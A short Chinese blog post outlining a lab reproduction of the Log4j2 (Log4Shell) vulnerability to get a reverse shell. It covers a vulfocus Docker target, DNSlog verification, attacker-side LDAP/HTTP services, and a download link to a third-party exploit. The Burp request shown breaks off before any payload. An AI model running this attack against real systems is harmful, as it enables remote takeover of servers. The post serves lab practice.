log4j2核弹级漏洞靶场复现(反弹shell)

环境搭建:
本次漏洞复现采用vulfocus的log4j2靶场docker
使用Kali系统进行复现实验
搭建docker拉取漏洞镜像可参考以下链接:
https://blog.csdn.net/weixin_47019868/article/details/122010972
log4漏洞镜像

启动环境

漏洞验证:

dnslog回显则漏洞存在
 
漏洞利用:
接下来利用漏洞反弹shell,这里用的是大佬的exp,百度云链接如下:
链接:https://pan.baidu.com/s/1ABBPDmtMQktehVBt5MYwvg
提取码:gr3n

kali攻击机启动ldap服务和http服务

burpsuite构造payload
POST /hello HTTP/1.1
Host: 192.168.10.244:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox

log4j2核弹级漏洞靶场复现(反弹shell)最先出现在Python成神之路

版权声明:
作者:dingding
链接:https://www.techfm.club/p/13194.html
来源:TechFM
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>